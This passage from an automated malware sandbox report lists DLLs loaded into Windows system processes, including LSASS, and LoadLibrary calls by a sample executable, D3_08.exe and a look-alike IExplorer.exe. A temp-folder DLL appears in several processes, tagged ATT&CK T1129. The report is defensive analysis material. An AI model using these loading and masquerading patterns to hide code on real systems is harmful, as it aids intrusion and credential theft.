\"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 74c90000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 755a0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76cd0000\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76da0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 74c90000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 755a0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76cd0000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76da0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"LSASS.EXE\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71410000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76da0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 688b0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 74c80000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 76c30000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 74c90000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74790000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74520000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75cb0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73920000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76da0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75e40000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 755a0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 73c80000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75510000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73a80000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76da0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76a90000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 75450000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74200000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76cd0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74c30000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b90000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005884)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002060)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005952)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006124)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004180)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004180)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004284)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004284)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004284)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004284)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004284)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004284)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004136)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004136)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006048)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006048)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003928)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003928)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003928)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003928)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004084)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004084)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003800)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003800)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003456)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003456)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003456)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003456)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003456)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003456)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002208)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004316)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004316)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004316)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004316)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004036)\n 